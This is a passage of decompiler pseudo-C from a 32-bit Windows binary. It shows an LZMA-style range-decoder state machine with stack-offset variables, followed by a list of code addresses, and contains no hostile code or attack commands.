                                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  												goto L132;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x28);
                                                                                  											goto L89;
                                                                                  										case 0xb:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__ecx =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x20);
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x28);
                                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  											L89:
                                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  											L90:
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  											goto L69;
                                                                                  										case 0xc:
                                                                                  											L100:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t335 = __ebp - 0x70;
                                                                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t335;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											__eax =  *(__ebp - 0x2c);
                                                                                  											goto L102;
                                                                                  										case 0xd:
                                                                                  											L37:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t122 = __ebp - 0x70;
                                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t122;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L39:
                                                                                  											__eax =  *(__ebp - 0x40);
                                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  												goto L48;
                                                                                  											}
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												goto L54;
                                                                                  											}
                                                                                  											L41:
                                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  											 *(__ebp - 0x48) = __eax;
                                                                                  											__eax = __eax + 1;
                                                                                  											__eax = __eax << 8;
                                                                                  											__eax = __eax + __ebx;
                                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edx = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												 *(__ebp - 0x40) = 1;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												__ebx = __ebx + __ebx + 1;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edx;
                                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L39;
                                                                                  											} else {
                                                                                  												goto L37;
                                                                                  											}
                                                                                  										case 0xe:
                                                                                  											L46:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t156 = __ebp - 0x70;
                                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t156;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											while(1) {
                                                                                  												L48:
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													break;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__edx = __ebx + __ebx;
                                                                                  												__ecx =  *(__ebp - 0x10);
                                                                                  												__esi = __edx + __eax;
                                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													_t170 = __edx + 1; // 0x1
                                                                                  													__ebx = _t170;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													continue;
                                                                                  												} else {
                                                                                  													goto L46;
                                                                                  												}
                                                                                  											}
                                                                                  											L54:
                                                                                  											_t173 = __ebp - 0x34;
                                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  											__eflags =  *_t173;
                                                                                  											goto L55;
                                                                                  										case 0xf:
                                                                                  											L58:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t203 = __ebp - 0x70;
                                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t203;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L60:
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												L55:
                                                                                  												__al =  *(__ebp - 0x44);
                                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  												goto L56;
                                                                                  											}
                                                                                  											L61:
                                                                                  											__eax =  *(__ebp - 0x58);
                                                                                  											__edx = __ebx + __ebx;
                                                                                  											__ecx =  *(__ebp - 0x10);
                                                                                  											__esi = __edx + __eax;
                                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edi = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												_t217 = __edx + 1; // 0x1
                                                                                  												__ebx = _t217;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edi;
                                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L60;
                                                                                  											} else {
                                                                                  												goto L58;
                                                                                  											}
                                                                                  										case 0x10:
                                                                                  											L110:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t366 = __ebp - 0x70;
                                                                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t366;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											goto L112;
                                                                                  										case 0x11:
                                                                                  											L69:
                                                                                  											__esi =  *(__ebp - 0x58);
                                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                                  											L132:
                                                                                  											 *(_t612 - 0x54) = _t605;
                                                                                  											goto L133;
                                                                                  										case 0x12:
                                                                                  											goto L0;
                                                                                  										case 0x13:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												_t469 = __ebp - 0x58;
                                                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  												__eflags =  *_t469;
                                                                                  												 *(__ebp - 0x30) = 0x10;
                                                                                  												 *(__ebp - 0x40) = 8;
                                                                                  												goto L144;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x4c);
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                                  											 *(__ebp - 0x30) = 8;
                                                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  											goto L130;
                                                                                  										case 0x14:
                                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  											__eax =  *(__ebp - 0x80);
                                                                                  											L140:
                                                                                  											 *(_t612 - 0x88) = _t533;
                                                                                  											goto L1;
                                                                                  										case 0x15:
                                                                                  											__eax = 0;
                                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  											__al = __al & 0x000000fd;
                                                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  											goto L121;
                                                                                  										case 0x16:
                                                                                  											__eax =  *(__ebp - 0x30);
                                                                                  											__eflags = __eax - 4;
                                                                                  											if(__eax >= 4) {
                                                                                  												_push(3);
                                                                                  												_pop(__eax);
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 4);
                                                                                  											 *(__ebp - 0x40) = 6;
                                                                                  											__eax = __eax << 7;
                                                                                  											 *(__ebp - 0x7c) = 0x19;
                                                                                  											 *(__ebp - 0x58) = __eax;
                                                                                  											goto L145;
                                                                                  										case 0x17:
                                                                                  											goto L145;
                                                                                  										case 0x18:
                                                                                  											L146:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0x18;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t484 = __ebp - 0x70;
                                                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t484;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L148:
                                                                                  											_t487 = __ebp - 0x48;
                                                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                  											__eflags =  *_t487;
                                                                                  											goto L149;
                                                                                  										case 0x19:
                                                                                  											__eflags = __ebx - 4;
                                                                                  											if(__ebx < 4) {
                                                                                  												 *(__ebp - 0x2c) = __ebx;
                                                                                  												L120:
                                                                                  												_t394 = __ebp - 0x2c;
                                                                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                  												__eflags =  *_t394;
                                                                                  												L121:
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax;
                                                                                  												if(__eax == 0) {
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  												__eax =  *(__ebp - 0x30);
                                                                                  												_t401 = __ebp - 0x60;
                                                                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  												__eflags =  *_t401;
                                                                                  												goto L124;
                                                                                  											}
                                                                                  											__ecx = __ebx;
                                                                                  											__eax = __ebx;
                                                                                  											__ecx = __ebx >> 1;
                                                                                  											__eax = __ebx & 0x00000001;
                                                                                  											__ecx = (__ebx >> 1) - 1;
                                                                                  											__al = __al | 0x00000002;
                                                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                                                  											__eflags = __ebx - 0xe;
                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                  											if(__ebx >= 0xe) {
                                                                                  												__ebx = 0;
                                                                                  												 *(__ebp - 0x48) = __ecx;
                                                                                  												L103:
                                                                                  												__eflags =  *(__ebp - 0x48);
                                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                                  													__eax = __eax + __ebx;
                                                                                  													 *(__ebp - 0x40) = 4;
                                                                                  													 *(__ebp - 0x2c) = __eax;
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                                                  													__eflags = __eax;
                                                                                  													L109:
                                                                                  													__ebx = 0;
                                                                                  													 *(__ebp - 0x58) = __eax;
                                                                                  													 *(__ebp - 0x50) = 1;
                                                                                  													 *(__ebp - 0x44) = 0;
                                                                                  													 *(__ebp - 0x48) = 0;
                                                                                  													L113:
                                                                                  													__eax =  *(__ebp - 0x40);
                                                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  														_t392 = __ebp - 0x2c;
                                                                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                  														__eflags =  *_t392;
                                                                                  														goto L120;
                                                                                  													}
                                                                                  													__eax =  *(__ebp - 0x50);
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													__esi = __edi + __eax;
                                                                                  													 *(__ebp - 0x54) = __esi;
                                                                                  													__ax =  *__esi;
                                                                                  													__ecx = __ax & 0x0000ffff;
                                                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                                                  														__ecx = 0;
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  														__ecx = 1;
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  														__ebx = 1;
                                                                                  														__ecx =  *(__ebp - 0x48);
                                                                                  														__ebx = 1 << __cl;
                                                                                  														__ecx = 1 << __cl;
                                                                                  														__ebx =  *(__ebp - 0x44);
                                                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  														__cx = __ax;
                                                                                  														__cx = __ax >> 5;
                                                                                  														__eax = __eax - __ecx;
                                                                                  														__edi = __edi + 1;
                                                                                  														__eflags = __edi;
                                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                                  														 *__esi = __ax;
                                                                                  														 *(__ebp - 0x50) = __edi;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x10) = __edx;
                                                                                  														0x800 = 0x800 - __ecx;
                                                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  														 *__esi = __dx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														L112:
                                                                                  														_t369 = __ebp - 0x48;
                                                                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                  														__eflags =  *_t369;
                                                                                  														goto L113;
                                                                                  													} else {
                                                                                  														goto L110;
                                                                                  													}
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0xc);
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  													__ecx =  *(__ebp - 0x10);
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  													__ebx = __ebx | 0x00000001;
                                                                                  													__eflags = __ebx;
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													L102:
                                                                                  													_t339 = __ebp - 0x48;
                                                                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                  													__eflags =  *_t339;
                                                                                  													goto L103;
                                                                                  												} else {
                                                                                  													goto L100;
                                                                                  												}
                                                                                  											}
                                                                                  											__edx =  *(__ebp - 4);
                                                                                  											__eax = __eax - __ebx;
                                                                                  											 *(__ebp - 0x40) = __ecx;
                                                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  											goto L109;
                                                                                  										case 0x1a:
                                                                                  											L56:
                                                                                  											__eflags =  *(__ebp - 0x64);
                                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0x1a;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x68);
                                                                                  											__al =  *(__ebp - 0x5c);
                                                                                  											__edx =  *(__ebp - 8);
                                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  											 *( *(__ebp - 0x68)) = __al;
                                                                                  											__ecx =  *(__ebp - 0x14);
                                                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  											__eax = __ecx + 1;
                                                                                  											__edx = 0;
                                                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                                  											__edx = _t192;
                                                                                  											goto L80;
                                                                                  										case 0x1b:
                                                                                  											L76:
                                                                                  											__eflags =  *(__ebp - 0x64);
                                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0x1b;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x14);
                                                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                                                  												__eflags = __eax;
                                                                                  											}
                                                                                  											__edx =  *(__ebp - 8);
                                                                                  											__cl =  *(__eax + __edx);
                                                                                  											__eax =  *(__ebp - 0x14);
                                                                                  											 *(__ebp - 0x5c) = __cl;
                                                                                  											 *(__eax + __edx) = __cl;
                                                                                  											__eax = __eax + 1;
                                                                                  											__edx = 0;
                                                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                                  											__edx = _t275;
                                                                                  											__eax =  *(__ebp - 0x68);
                                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  											_t284 = __ebp - 0x64;
                                                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                  											__eflags =  *_t284;
                                                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                                                  											L80:
                                                                                  											 *(__ebp - 0x14) = __edx;
                                                                                  											goto L81;
                                                                                  										case 0x1c:
                                                                                  											while(1) {
                                                                                  												L124:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													break;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												__cl =  *(__eax + __edx);
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                                  												 *(__eax + __edx) = __cl;
                                                                                  												__eax = __eax + 1;
                                                                                  												__edx = 0;
                                                                                  												_t415 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t415;
                                                                                  												__eax =  *(__ebp - 0x68);
                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  												__eflags =  *(__ebp - 0x30);
                                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                                  												 *(__ebp - 0x14) = _t415;
                                                                                  												if( *(__ebp - 0x30) > 0) {
                                                                                  													continue;
                                                                                  												} else {
                                                                                  													L81:
                                                                                  													 *(__ebp - 0x88) = 2;
                                                                                  													goto L1;
                                                                                  												}
                                                                                  											}
                                                                                  											 *(__ebp - 0x88) = 0x1c;
                                                                                  											L170:
                                                                                  											_push(0x22);
                                                                                  											_pop(_t567);
                                                                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                  											_t535 = 0;
                                                                                  											L172:
                                                                                  											return _t535;
                                                                                  									}
                                                                                  								}
                                                                                  								L171:
                                                                                  								_t535 = _t534 | 0xffffffff;
                                                                                  								goto L172;
                                                                                  							}
                                                                                  						}
                                                                                  						__eax =  *(__ebp - 0x50);
                                                                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  						__eax =  *(__ebp - 0x58);
                                                                                  						__esi = __edx + __eax;
                                                                                  						 *(__ebp - 0x54) = __esi;
                                                                                  						__ax =  *__esi;
                                                                                  						__edi = __ax & 0x0000ffff;
                                                                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  						if( *(__ebp - 0xc) >= __ecx) {
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  							__cx = __ax;
                                                                                  							__cx = __ax >> 5;
                                                                                  							__eax = __eax - __ecx;
                                                                                  							__edx = __edx + 1;
                                                                                  							 *__esi = __ax;
                                                                                  							 *(__ebp - 0x50) = __edx;
                                                                                  						} else {
                                                                                  							 *(__ebp - 0x10) = __ecx;
                                                                                  							0x800 = 0x800 - __edi;
                                                                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  							 *__esi = __cx;
                                                                                  						}
                                                                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  							goto L148;
                                                                                  						} else {
                                                                                  							goto L146;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L1;
                                                                                  				}
                                                                                  			}








                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x00000000
                                                                                  0x0040739b
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00406be3
